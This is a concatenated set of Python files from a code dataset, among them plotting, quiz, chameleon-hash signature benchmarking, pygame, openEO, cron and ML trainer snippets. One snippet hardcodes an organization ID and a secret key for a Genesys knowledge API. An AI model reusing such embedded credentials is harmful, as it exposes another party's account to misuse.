Plot\nsns.set()\nsns.set_context('talk')\nplt.figure(figsize=(10,6))\nplt.title('US Software Developer Employment', fontsize=18, fontweight='bold')\nax = sns.lineplot(x='Year', y='Value',\n                  hue='Demographic', style='Demographic',\n                  palette=sns.color_palette(\"hls\", 5),\n                  linewidth=2.5, alpha=.75, data=df)\nax.set_ylabel('Percent of Respondents')\nax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\nplt.xticks(range(2013,2018,1))\nplt.show()\n","sub_path":"BLS_SD_Employment.py","file_name":"BLS_SD_Employment.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}{"seq_id":"513067855","text":"from time import sleep\ndef divider():\n    # print a separator line\n    print('=='*40)\ndivider()\nprint(' PYTHON QUIZ')\ndivider()\nscore = 0\nprint('''\nQ-1 What is Python?\na) A set of editing tools\nb) A game\nc) A programming language\n''')\nquestao1 = input().lower()\nif questao1 == 'c':\n    print('Correct answer!')\n    score += 1\nelse:\n    print('Incorrect answer!')\n\nprint('''\nQ-2 What is another meaning of the name Python?\na) Snake\nb) Kite\nc) Code\n''')\nquestao2 = input().lower()\nif questao2 == 'a':\n    print('Correct answer!')\n    score += 1\nelse:\n    print('Incorrect answer!')\n\nprint('''\nQ-3 Which command do I use to import modules in Python?\na) int\nb) import\nc) sqrt\n''')\nquestao3 = input().lower()\nif questao3 == 'b':\n    print('Correct answer!')\n    score += 1\nelse:\n    print('Incorrect answer!')\n\nprint('''\nQ-4 Which example is a boolean value?\na) 2.0\nb) 5\nc) TRUE / FALSE\n''')\nquestao4 = input().lower()\nif questao4 == 'c':\n    print('Correct answer!')\n    score += 1\nelse:\n    print('Incorrect answer!')\n\nprint('''\nQ-5 Which function prints something on the screen?\na) print\nb) float\nc) input\n''')\nquestao5 = input().lower()\nif questao5 == 'a':\n    print('Correct answer!')\n    score += 1\nelse:\n    print('Incorrect answer!')\nsleep(0.5)\ndivider()\nprint('Calculating the score...')\nsleep(0.5)\ndivider()\nsleep(1)\nprint(f'Your score was {score} points. 
')\nsleep(1)\n\n\nif score == 5:\n    print('Congratulations, keep it up!')\nelse:\n    print('Study harder next time!!')\n","sub_path":"Desafio04.py","file_name":"Desafio04.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}{"seq_id":"378685945","text":"# n users, each with a PK, SK and r; CH = g^m * h1^r1 * h2^r2 ... hn^rn mod p\r\n# four functions: Setup(), KeyGen(), ChameleonHash(), Forge()\r\nimport random\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport pandas as pd\r\nfrom pyunit_prime import get_large_prime_length # randomly generate a large prime of the given length\r\nfrom pyunit_prime import is_prime # primality test\r\nfrom pyunit_prime import prime_range # list the primes in a given interval\r\nimport math\r\nimport myrsa\r\nimport base64\r\nimport hashlib\r\nimport rsa\r\nfrom rsa import common, transform, core\r\nfrom rsa.pkcs1 import _pad_for_signing\r\nfrom ecdsa import SigningKey\r\nimport time\r\n\r\nlength = 128\r\nglobal p,q,g,n,i,SKlist,PKlist,rlist,CHpublic,CHprivate,r1\r\nglobal sizes \r\np,q,g = 0,0,0\r\nChSign_public_key, ChSign_private_key = myrsa.newkeys()\r\n\r\ndef primeFactorization(k):# prime factorization\r\n    while True:\r\n        q=get_large_prime_length(length)\r\n        p=(q*k+1)if(k%2==0)else(q*(k+1)+1)\r\n        if is_prime(p)==True:\r\n            break\r\n        else:\r\n            continue\r\n    primeList=prime_range(2,int(math.sqrt(k)))\r\n    result=[[0,0] for i in range(len(primeList))]\r\n    for i in range(len(primeList)):\r\n        result[i][0]=primeList[i]\r\n        while k%primeList[i]==0:\r\n            result[i][1]+=1\r\n            k=k//primeList[i]\r\n    if k!=1:\r\n        result.append([k,1])\r\n    result.append([q,1])\r\n    return result,p,q \r\n\r\ndef quickPower(a,b,c):# fast modular exponentiation, a^b mod c\r\n    result=1\r\n    while b>0:\r\n        if b%2==1:\r\n            result=result*a%c\r\n        a=a*a%c\r\n        b>>=1\r\n    return result\r\n\r\ndef getGenerator(result,p,q): #get g\r\n    generator=random.randint(1,1000)\r\n    while True:\r\n        if quickPower(generator,q,p)!=1:\r\n            generator+=1\r\n        else:\r\n            for i in range(len(result)):\r\n                if quickPower(generator,int((p-1)/result[i][0]),p)==1:\r\n                    break\r\n            if i!=len(result)-1:\r\n                generator+=1\r\n            else:\r\n                break\r\n    return generator\r\n\r\ndef Setup(k):#input the security number k\r\n    factorization,p,q=primeFactorization(k)\r\n    g=getGenerator(factorization,p,q)\r\n    return p,q,g\r\n\r\ndef getSecretKey(n,q): #get SKlist,x1,x2……xn\r\n    SKlist=[]\r\n    for _ in range(n):\r\n        SKlist.append(random.randint(1,q))\r\n    return SKlist\r\n\r\ndef getPublicKey(g,SKlist,n,p):#get PKlist,h1,h2……hn\r\n    PKlist=[]\r\n    for i in range(n):\r\n        PKlist.append(quickPower(g,SKlist[i],p))\r\n    return PKlist\r\n\r\ndef KeyGen(p,q,g,n):# outputs the chameleon hash public and private keys\r\n    SKlist=getSecretKey(n,q)\r\n    PKlist=getPublicKey(g,SKlist,n,p)\r\n    return SKlist,PKlist\r\n\r\ndef getr(n,q):# rlist,r1,r2……rn\r\n    rlist=[]\r\n    for _ in range(n):\r\n        rlist.append(random.randint(1,q))\r\n    return rlist\r\n\r\ndef treatMSG(msg): # encode the message msg as an integer\r\n    newmsg=''\r\n    for i in msg:\r\n        newmsg+=str(ord(i))\r\n    return int(newmsg)# concatenate the ASCII codes of all characters, then convert to int\r\n\r\ndef ChameleonHash(CHpublickey,m,r):# chameleon hash\r\n    newm=treatMSG(m)\r\n    CH=quickPower(g,newm,p)\r\n    CH=CH*quickPower(CHpublickey,r,p)\r\n    CH=CH%p\r\n    return CH\r\n\r\ndef exgcd(a,b):# extended Euclid: find x and y such that a*x + b*y = gcd(a,b)\r\n    if b==0:\r\n        return 1,0,a\r\n    else:\r\n        x,y,gcd=exgcd(b,a%b)\r\n        x,y=y,(x-(a//b)*y)\r\n        return x,y,gcd\r\n\r\ndef Forge(CHprivatekey,m1,r,m2):# solve the linear congruence for r'\r\n    newm1=treatMSG(m1) # encode message 1 as an integer\r\n    newm2=treatMSG(m2) # encode message 2 as an integer\r\n    x,y,gcd=exgcd(CHprivatekey,q)\r\n    result=x*(newm1-newm2+CHprivatekey*r)%q\r\n    return result\r\n\r\ndef signature_hhj(after_hash, private_key, 
encoding='utf8'):\r\n    after_hash1 = str(after_hash)\r\n    after_hash2 = after_hash1.encode(encoding)\r\n    prider = base64.b64decode(private_key)\r\n    priv_key = rsa.PrivateKey.load_pkcs1(prider, 'DER')\r\n    keylength = common.byte_size(priv_key.n)\r\n    block_length = keylength - 11\r\n    assert block_length > 0, 'nbits of key is too small, please set it bigger than 128!'\r\n    signature = b''\r\n    while after_hash2:\r\n        cleartext = after_hash2[:block_length]\r\n        after_hash2 = after_hash2[block_length:]\r\n        # ===== copy from rsa.pkcs1:sign_hash =====\r\n        padded = _pad_for_signing(cleartext, keylength)\r\n        payload = transform.bytes2int(padded)\r\n        encrypted = priv_key.blinded_encrypt(payload)\r\n        block = transform.int2bytes(encrypted, keylength)\r\n        signature += block\r\n    signature = base64.b64encode(signature).decode()\r\n    #print(\"-------------- signing succeeded --------------\")\r\n    return signature\r\n\r\ndef verify_hhj(after_hash, signature, publickey, encoding='utf8'):\r\n    after_hash1 = str(after_hash)\r\n    signature_full = base64.b64decode(signature)\r\n    pubder = base64.b64decode(publickey)\r\n    pub_key = rsa.PublicKey.load_pkcs1(pubder, 'DER')\r\n    keylength = common.byte_size(pub_key.n)\r\n    decrypted_hash = b''\r\n    while signature_full:\r\n        signature = signature_full[:keylength]\r\n        signature_full = signature_full[keylength:]\r\n        encrypted = transform.bytes2int(signature)\r\n        decrypted = core.decrypt_int(encrypted, pub_key.e, pub_key.n)\r\n        clearsig = transform.int2bytes(decrypted, keylength)\r\n        if clearsig[0:2] != b'\\x00\\x01':\r\n            return False\r\n        clearsig = clearsig[2:]\r\n        if b'\\x00' not in clearsig:\r\n            return False\r\n        sep_idx = clearsig.index(b'\\x00')\r\n        clearsig = clearsig[sep_idx + 1:]\r\n        decrypted_hash += clearsig\r\n    decrypted_hash = str(decrypted_hash,'utf-8')\r\n    return decrypted_hash == after_hash1\r\n\r\ndef Chameleonsign(CHpublickey,m,r,private_key):\r\n    Hash = ChameleonHash(CHpublickey,m,r)\r\n    return signature_hhj(Hash,private_key)\r\n\r\ndef Chsign_Verify(CHpublickey,m,r,signature,public_key):\r\n    Hash = ChameleonHash(CHpublickey,m,r)\r\n    return verify_hhj(Hash,signature,public_key)\r\n\r\ndef getRandomSet(bits):\r\n    num_set = [chr(i) for i in range(48,58)]\r\n    char_set = [chr(i) for i in range(97,123)]\r\n    total_set = num_set + char_set\r\n    ram = ''\r\n    s = int(bits/20)\r\n    for i in range(s):\r\n        value_set = \"\".join(random.sample(total_set, 20))\r\n        ram = ram + value_set\r\n    a = bits%20\r\n    for i in range(a):\r\n        value_set = \"\".join(random.sample(total_set, 1))\r\n        ram = ram + value_set\r\n    return ram\r\n\r\ndef Calculate_Time(n,method):\r\n    global sizes \r\n    if n == 1:\r\n        print(\"data size too small\")\r\n        return\r\n    random_list = []\r\n    for i in range(n):\r\n        strings = getRandomSet(sizes)\r\n        random_list.append(strings)\r\n    if method == \"Chameleon\":\r\n        rlist=[]\r\n        for _ in range(n):\r\n            rlist.append(random.randint(1,q))\r\n        #print(rlist)\r\n        time_CHSign_Start = time.time()\r\n        for i in range(n):#0~n-1\r\n            if i == 0:\r\n                Chameleonsign(CHpublic,random_list[i],rlist[i],ChSign_private_key)\r\n            else:\r\n                rlist[i] = Forge(CHprivate,random_list[0],rlist[0],random_list[i])\r\n        time_CHSign_End = time.time()\r\n        return time_CHSign_End-time_CHSign_Start\r\n    elif method == \"ECDSA\":\r\n        ecdsa_private_key = SigningKey.generate()\r\n        ecdsa_public_key = ecdsa_private_key.verifying_key\r\n        time_ecdsa_start = time.time()\r\n        for i in range(n):\r\n            ecdsa_message=bytes(random_list[i], encoding='utf-8')\r\n            ecdsa_signature = ecdsa_private_key.sign(ecdsa_message)\r\n            #ecdsa_public_key.verify(ecdsa_signature, 
ecdsa_message)\r\n        time_ecdsa_end = time.time()\r\n        return time_ecdsa_end - time_ecdsa_start\r\n    else:\r\n        print('please input: \"ECDSA\" OR \"Chameleon\"')\r\n        return None\r\n\r\ndef test(k):\r\n    global p,q,g,n,i,SKlist,PKlist,rlist,CHpublic,CHprivate,r1\r\n    init(k)# pass in the security parameter k \r\n    print(\"Security parameter is %d, test case below:\\n\" % k)\r\n    print('q:',q)\r\n    print('p:',p)\r\n    print('g:',g)\r\n    print('Chameleon hash private key list:',SKlist)\r\n    print('Chameleon hash public key list:',PKlist)\r\n    print('Chameleon hash random value list:',rlist)\r\n    print('')\r\n    m1='messageuestc1'# message 1\r\n    m2='hhj2'# message 2\r\n    CH=ChameleonHash(CHpublic,m1,r1)\r\n    print('Message 1:',m1)\r\n    print('Random value 1:',r1)\r\n    print('Chameleon hash:',CH)\r\n    print('')\r\n    rand2=Forge(CHprivate,m1,r1,m2)\r\n    newCH=ChameleonHash(CHpublic,m2,rand2)\r\n    print('Message 2:',m2)\r\n    print('Random value 2:',rand2)\r\n    print('Colliding chameleon hash:',newCH)\r\n    print('')\r\n    print(\"Chameleon signature public key: \"+ChSign_public_key)\r\n    print(\"Chameleon signature private key: \"+ChSign_private_key)\r\n    signature = Chameleonsign(CHpublic,m1,r1,ChSign_private_key)\r\n    print('Chameleon signature result: '+signature)\r\n    verify = Chsign_Verify(CHpublic,m1,r1,signature,ChSign_public_key)\r\n    if verify:\r\n        print('signature verification succeeded')\r\n    else:\r\n        print('signature verification failed')\r\n\r\ndef init(k):\r\n    global p,q,g,n,i,SKlist,PKlist,rlist,CHpublic,CHprivate,r1\r\n    n=5 # n users\r\n    i=2# the i-th user\r\n    p,q,g=Setup(k)# generate p,q,g from the security parameter\r\n    SKlist,PKlist=KeyGen(p,q,g,n)\r\n    rlist=getr(n,q)\r\n    CHpublic,CHprivate,r1 = PKlist[i-1],SKlist[i-1],rlist[i-1]\r\n    print('\\n')\r\n    print('------------------------------------------ data initialization finished ------------------------------------------\\n')\r\n    return\r\n\r\nif __name__ == \"__main__\":\r\n    global sizes \r\n    k = 128\r\n    #test(k)# print the test case\r\n    init(k)# pass in the security parameter k \r\n    data_m=[\"number of messages:\"]\r\n    data_ch=[\"chameleon signing time:\"]\r\n    data_ecdsa=[\"ECDSA signing time:\"]\r\n    scale = [1000,2000,4000,6000,8000,10000] # data sizes to benchmark\r\n    Sign_method =[\"Chameleon\",\"ECDSA\"]\r\n    sizes = 100\r\n    for j in range(len(scale)):\r\n        print(\"data size:\",scale[j],\"messages of\",sizes,\"bytes each\")\r\n        data_m.append(scale[j])\r\n        for i in range(len(Sign_method)):\r\n            time_Consume = round(Calculate_Time(scale[j],Sign_method[i]),5)\r\n            print(Sign_method[i]+\" signing time:\",time_Consume,\"s\")\r\n            if(i==0):\r\n                data_ch.append(time_Consume)\r\n            else:\r\n                data_ecdsa.append(time_Consume)\r\n        print('\\n')\r\n    datas=[]\r\n    datas.append(data_m)\r\n    datas.append(data_ch)\r\n    datas.append(data_ecdsa)\r\n    df = pd.DataFrame(datas)\r\n    df.to_excel(\"C:\\\\Users\\\\12091\\\\Desktop\\\\hhj1.xlsx\", index=None)","sub_path":"Design/乱/HHJ_hash.py","file_name":"HHJ_hash.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}{"seq_id":"614194575","text":"import sys,math,random,pygame\n\n# GAME PARAMETERS\nWIDTH = 640\nHEIGHT = 480\nFPS = 60\nTITLE = \"My game\"\nBLEU = (0,0,255)\n\nclass Carre(pygame.sprite.Sprite):\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        self.image = pygame.Surface((50,50))\n        self.image.fill(BLEU)\n        self.image.set_colorkey(BLEU)\n\n\n\n# GAME INITIALIZATION\npygame.init()\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(TITLE)\nrectScreen = screen.get_rect()\n\n\n# ... 
TO BE COMPLETED WITH YOUR INITIALIZATION CODE ...\ncarre = pygame.image.load(\"bleu-carre.png\").convert_alpha()\nrectCarre = carre.get_rect()\nrectCarre.topleft = (100,50)\n# GAME LOOP\nclock = pygame.time.Clock()\nwhile True:\n\ttime = clock.tick(FPS)\n\n\t# EVENT HANDLING\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit(0)\n\tscreen.blit(carre,rectCarre)\n\n\t# ... TO BE COMPLETED WITH YOUR GAME CODE ...\n\n\t# UPDATE THE DISPLAY\n\tpygame.display.flip()\n\n","sub_path":"Axel-Dany-Gaston/Pyagme_projekt+gaston.py","file_name":"Pyagme_projekt+gaston.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}{"seq_id":"570061731","text":"import logging\n\nimport openeo\n\n#enable logging in requests library\nlogging.basicConfig(level=logging.DEBUG)\n\n#connect with VITO backend\nconnection = openeo.connect(\"https://openeo.vito.be\")\n\n#retrieve the list of available collections\ncollections = connection.list_collections()\nprint(collections)\n\n#create image collection\ns2_fapar = connection.load_collection(\"BIOPAR_FAPAR_V1_GLOBAL\",\n                                      spatial_extent={'west':16.138916,'east':16.524124,'south':48.1386,'north':48.320647,'crs':4326},\n                                      temporal_extent=[\"2016-01-01\",\"2016-03-10\"] )\n\n#specify process graph\ndownload = s2_fapar \\\n    .max_time() \\\n    .download(\"/tmp/openeo-composite.geotiff\",format=\"GeoTiff\")\nprint(download)","sub_path":"examples/download_composite.py","file_name":"download_composite.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}{"seq_id":"405894122","text":"import subprocess\nimport datetime\nimport argparse\n\nimport google_sheet as gs\nimport email_stats\n\nparser = argparse.ArgumentParser(description='Pass environment to kick off gfw-sync cron job.')\nparser.add_argument('--environment', '-e', default='DEV', choices=('DEV', 'PROD'),\n                    help='the environment/config files to use for this run')\nargs = parser.parse_args()\n\n\ndef parse_update_freq(field_text):\n    \"\"\"\n    Read the update_freq field from the config table and determine if the layer in question needs to be updated today\n    :param field_text: the value in the update_freq column\n    :return:\n    \"\"\"\n    update_layer = False\n\n    # Check that the layer has an update frequency first\n    if field_text:\n\n        # If the field text has brackets, let's examine it\n        if field_text[0] == '[' and field_text[-1] == ']':\n            field_text = field_text.replace('[', '').replace(']', '')\n\n            # If it has '-', assume it's a range and build a list\n            if '-' in field_text:\n                start_day, end_day = field_text.split('-')\n                day_list = range(int(start_day), int(end_day) + 1)\n\n            # Otherwise assume it's a list of dates\n            else:\n                day_list_text = field_text.split(',')\n                day_list = [int(x.strip()) for x in day_list_text]\n\n        else:\n            day_list = []\n\n        # Check to see if today's date is in the list we just built\n        # If so, update this layer\n        if datetime.datetime.now().day in day_list:\n            update_layer = True\n\n    return update_layer\n\n\t\ndef main():\n\tall_layer_dict = gs.sheet_to_dict(args.environment)\n\n\tfor layername, layerdef in all_layer_dict.iteritems():\n\n\t\tupdate_layer_today = parse_update_freq(layerdef['update_days'])\n\n\t\tif update_layer_today:\n\t\t\tsubprocess.call(['python', 'gfw-sync.py', '-l', layername, '-e', args.environment])\n\n\temail_stats.send_summary()\n\nif __name__ == '__main__':\n 
main()","sub_path":"utilities/cronjob.py","file_name":"cronjob.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}{"seq_id":"546356795","text":"from 淘票票.get_cities import TaoPP\nfrom 淘票票.get_cinmal_length import *\nfrom 淘票票.get_cinmal_href import *\n\ndef main():\n    t = TaoPP()\n    cities = t.city_list()\n    page_len_list = run()\n    tc = TaoPPCinemal()\n    for i in range(len(cities)):\n        city_code = cities[i][\"城市编码\"]\n        city_name = cities[i][\"城市名称\"]\n        tc.get_msg_save(int(page_len_list[i]), city_code)\n\nif __name__ == '__main__':\n    main()","sub_path":"爬虫1/淘票票/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"203395789","text":"import types\nfrom ..base import _wrap\n\n\ndef Count(foo, foo_kwargs=None):\n    foo_kwargs = foo_kwargs or {}\n    foo = _wrap(foo, foo_kwargs)\n\n    async def _count(foo):\n        count = 0\n        async for gen in foo():\n            if isinstance(gen, types.AsyncGeneratorType):\n                async for f in gen:\n                    count += 1\n                    yield count\n\n            elif isinstance(gen, types.GeneratorType):\n                for f in gen:\n                    count += 1\n                    yield count\n            else:\n                count += 1\n                yield count\n\n    return _wrap(_count, dict(foo=foo), name='Count', wraps=(foo,), share=foo)\n\n\ndef Sum(foo, foo_kwargs=None):\n    foo_kwargs = foo_kwargs or {}\n    foo = _wrap(foo, foo_kwargs)\n\n    async def _sum(foo):\n        sum = 0\n        async for gen in foo():\n            # async generators must be consumed with 'async for'\n            if isinstance(gen, types.AsyncGeneratorType):\n                async for f in gen:\n                    sum += f\n                    yield sum\n            elif isinstance(gen, types.GeneratorType):\n                for f in gen:\n                    sum += f\n                    yield sum\n            else:\n                sum += gen\n                yield sum\n\n    return _wrap(_sum, dict(foo=foo), name='Sum', wraps=(foo,), share=foo)\n","sub_path":"tributary/asynchronous/calculations/rolling.py","file_name":"rolling.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"472800525","text":"#start webapp\nimport cgi\nimport requests\nform = cgi.FieldStorage()\nsearchterm = form.getvalue('search')\nquestion = searchterm \nprint(question)\nreview = \"This is a review\"\n\n#get answer\n\nURL = \"https://api.genesysappliedresearch.com/v2/knowledge/generatetoken\"\nresponse = requests.post(url = URL, headers={'Accept':'*/*','cache-control':'no-cache','organizationid':'be64cce3-44f8-4cd5-9e12-dbfed265165c','secretkey':'0845a386-ab66-4fe8-a1cb-56ef34a3b658'})\njsonResponse = response.json()\ntoken = jsonResponse['token']\n#now get response\nresponse = requests.post(url = 'https://api.genesysappliedresearch.com/v2/knowledge/knowledgebases/7613d1f7-09a7-41f5-a0ba-94f7f6d91d2f/search', data = '{\"query\":\"'+question+'\",\"pageSize\": 5,\"pageNumber\": 1,\"sortOrder\": \"string\",\"sortBy\": \"string\",\"languageCode\":\"en-US\",\"documentType\": \"Faq\"}', headers = {'token':token})\njsonResponse = response.json()\n\nprint(token)\nprint(jsonResponse)\n\n#get best customer reviews\n\n#update client view\n\n#upload customer reviews\n\n","sub_path":"web_hosting/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"564938696","text":"numbers = \"1 2 3 4 5 6 7 8 9\"\r\nsymbols = [\"\", \"-\", \"+\"]\r\nequations_list = []\r\n\r\nfor i in range(3):\r\n    place1 = numbers.replace(\" \", symbols[i], 1)\r\n    for j in range(3):\r\n        place2 = place1.replace(\" \", symbols[j], 1)\r\n        for k in 
range(3):\r\n            place3 = place2.replace(\" \", symbols[k], 1)\r\n            for a in range(3):\r\n                place4 = place3.replace(\" \", symbols[a], 1)\r\n                for b in range(3):\r\n                    place5 = place4.replace(\" \", symbols[b], 1)\r\n                    for c in range(3):\r\n                        place6 = place5.replace(\" \", symbols[c], 1)\r\n                        for d in range(3):\r\n                            place7 = place6.replace(\" \", symbols[d], 1)\r\n                            for e in range(3):\r\n                                place8 = place7.replace(\" \", symbols[e], 1)\r\n                                if eval(place8) == 100:\r\n                                    equations_list.append(place8)\r\n\r\nprint(equations_list)\r\n","sub_path":"University_Python/Equations.py","file_name":"Equations.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"234795352","text":"from nltk import SnowballStemmer, word_tokenize\nfrom nltk.corpus import stopwords\n\nstoplist = stopwords.words('english')\nstoplist += ['.', ',', '?', '-', '–', '«', '»',\n             '(', ')', ':', ';', '#', '!', '$', '@', '%', '^', '&', '*', '+', '']\nstemmer = SnowballStemmer('english')\n\ndef parse(text):\n    words = word_tokenize(text.lower().strip())\n    i = 0\n    while i < len(words):\n        if words[i] in stoplist:\n            words.pop(i)\n        else:\n            i += 1\n    for i in range(len(words)):\n        words[i] = stemmer.stem(words[i])\n    return words\n","sub_path":"src/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}{"seq_id":"143221041","text":"# coding:utf-8\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nimport os\nimport time\nimport sys\nimport datetime\nimport ctypes\nimport json\nimport numpy as np\nimport pandas as pd\nimport copy\nfrom tqdm import tqdm\n# import sys,os\n# sys.path.append(os.path.dirname(__file__) + os.sep + '../')\nfrom .helper import optimizer_factory,metric_name2func ,early_stopping,ensureDir\n\nclass Trainer(object):\n\n    def __init__(self,\n                 model=None,\n                 train_data_loader=None,\n                 eval_set =None,\n                 train_times=1000,\n                 metric = ['auc'],\n                 opt_method=\"Adam\",\n                 optimizer = None,\n                 alpha=0.5,\n                 weight_decay=0.0,\n                 lr_decay=0,\n                 save_steps=100,\n                 early_stopping_rounds = None,\n                 verbose =None,\n                 use_gpu=False,\n                 checkpoint_dir=None):\n\n        self.model = model\n        self.train_data_loader = train_data_loader # data loader object; yields one epoch of data, i.e. nbatches batches\n        self.eval_set = eval_set #\n        self.train_times = train_times # number of training epochs\n        self.metrics = metric\n        self.metric_funcs = []\n        for mc in self.metrics:\n            self.metric_funcs.append(metric_name2func(mc))\n        self.criterion = F.binary_cross_entropy_with_logits\n\n        self.opt_method = opt_method # optimizer name (string)\n        self.optimizer = optimizer # the corresponding optimizer object\n        self.alpha = alpha # learning rate\n        self.lr_decay = lr_decay # learning rate decay\n        self.weight_decay = weight_decay #\n\n        self.early_stopping_rounds = early_stopping_rounds\n        self.verbose = verbose\n        self.save_steps = save_steps #\n        self.scheduler =None\n\n        self.use_gpu = use_gpu # whether to use the GPU\n        self.checkpoint_dir = checkpoint_dir # directory for saving checkpoints\n        if self.checkpoint_dir!=None:\n            ensureDir(checkpoint_dir)\n\n    # run one training step on a single batch\n    def train_one_step(self, data):\n        self.optimizer.zero_grad()\n        outputs = self.model(data) # size is 1\n        loss = self.criterion(outputs, data['label'])\n        loss.backward()\n        self.optimizer.step()\n        self.scheduler.step()\n        return loss.item()\n\n    def get_metric_scores(self,data):\n        outputs = self.model.predict_proba(data=data)\n        result = {}\n        for metric_name,metric_func in 
zip(self.metrics, self.metric_funcs):\n            result[metric_name] = metric_func(data['label'].data.numpy(), outputs)\n        return result\n\n    # configure the whole training process and drive the per-batch training step\n    def run(self):\n        if self.use_gpu:\n            self.model.cuda()\n        # configure the optimizer\n        self.optimizer = optimizer_factory(self.model,\n                                           opt_method=self.opt_method,\n                                           alpha=self.alpha,\n                                           lr_decay=self.lr_decay,\n                                           weight_decay=self.weight_decay)\n        print(\"Finish initializing...\")\n        self.scheduler = optim.lr_scheduler.OneCycleLR(optimizer=self.optimizer, pct_start=0.05, div_factor=1.5e3,\n                                                       max_lr=1e-2, epochs=self.train_times, steps_per_epoch=len(self.train_data_loader))\n        best_value = 0\n        stopping_step = 0\n        # train the model\n        for epoch in range(self.train_times):  # iterate for train_times epochs\n            self.model = self.model.train()\n            res = 0.0\n            for data in self.train_data_loader:  # iterate over the nbatches batches of one epoch\n                loss = self.train_one_step(data)  # size is 1\n                res += loss\n            res = res / self.train_data_loader.nbatches\n            eval_score = []\n            if self.eval_set != None:\n                with torch.no_grad():\n                    self.model = self.model.eval()\n                    for dataloader in self.eval_set:\n                        eval_score.append(self.get_metric_scores(dataloader.get_whole_data()))\n\n            if self.verbose != None and epoch % self.verbose == 0:\n                self.verbose_print(epoch, res, eval_score)\n\n            if self.save_steps != None and self.checkpoint_dir and (epoch + 1) % self.save_steps == 0:\n                print(\"Epoch %d has finished, saving...\" % (epoch))\n                ensureDir(self.checkpoint_dir)\n                self.model.save_checkpoint(os.path.join(self.checkpoint_dir + \"-\" + str(epoch) + \".ckpt\"))\n\n            if self.early_stopping_rounds != None:\n                early_stopping_score = eval_score[0][self.metrics[0]]\n                best_value, stopping_step, should_stop = early_stopping(early_stopping_score,\n                                                                        best_value,\n                                                                        stopping_step,\n                                                                        flag_step=self.early_stopping_rounds)\n                if stopping_step == 0 and self.checkpoint_dir != None:\n                    if self.model.best_iteration_ != None:\n                        os.remove(self.checkpoint_dir + f'model_iteration_{self.model.best_iteration_}.pkl')\n                    self.model.best_iteration_ = epoch\n                    self.model.save_checkpoint(self.checkpoint_dir + f'model_iteration_{self.model.best_iteration_}.pkl')\n                if should_stop:\n                    print(f\"Training until validation scores don't improve for {self.early_stopping_rounds} rounds\")\n                    print(f\"best iteration is {self.model.best_iteration_} and best_value is {best_value}\")\n                    break\n\n    def verbose_print(self, epoch, loss, eval_score):\n        print(f\"[{epoch}] train loss is {loss}\")\n        for i, score in enumerate(eval_score):\n            score_msg = f' {i}th score '\n            for key in score:\n                score_msg += f\"{key}:{score[key]} \"\n            print(score_msg)\n\n    def set_model(self, model):\n        self.model = model\n\n    def to_var(self, x, use_gpu):\n        if use_gpu:\n            return Variable(torch.from_numpy(x).cuda())\n        else:\n            return Variable(torch.from_numpy(x))\n\n    def set_use_gpu(self, use_gpu):\n        self.use_gpu = use_gpu\n\n    def set_alpha(self, alpha):\n        self.alpha = alpha\n\n    def set_lr_decay(self, lr_decay):\n        self.lr_decay = lr_decay\n\n    def set_weight_decay(self, weight_decay):\n        self.weight_decay = weight_decay\n\n    def set_opt_method(self, opt_method):\n        self.opt_method = opt_method\n\n    def set_train_times(self, train_times):\n        self.train_times = train_times\n\n    def set_save_steps(self, save_steps, checkpoint_dir=None):\n        self.save_steps = save_steps\n        if not self.checkpoint_dir:\n            self.set_checkpoint_dir(checkpoint_dir)\n\n    def set_checkpoint_dir(self, checkpoint_dir):\n        self.checkpoint_dir = 
checkpoint_dir","sub_path":"model/NFM/utility/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"277908525","text":"# Santosh Nepal\r\n# 1001112034\r\n#02/27/2018\r\n#----------------------------------------------------------------------\r\n# This code was originally created by Prof. Farhad Kamangar.\r\n# It has been somewhat modified and updated by Brian A. Dalio for use\r\n# in CSE 4303 / CSE 5365 in the 2018 Spring semester.\r\n\r\n#----------------------------------------------------------------------\r\nclass cl_world :\r\n def __init__( self, objects = [], canvases = [] ) :\r\n self.objects = objects\r\n self.canvases = canvases\r\n\r\n def add_canvas( self, canvas ) :\r\n self.canvases.append( canvas )\r\n canvas.world = self\r\n\r\n def delete_file(self, canvas):\r\n canvas.delete(\"all\")\r\n\r\n def create_graphic_objects( self, canvas ) :\r\n # 1. Create a line that goes from the upper left\r\n # to the lower right of the canvas.\r\n self.objects.append( canvas.create_line(\r\n 0, 0, canvas.cget( \"width\" ), canvas.cget( \"height\" ) ) )\r\n\r\n\r\n self.objects.append( canvas.create_line(\r\n canvas.cget( \"width\" ), 0, 0, canvas.cget( \"height\" ) ) 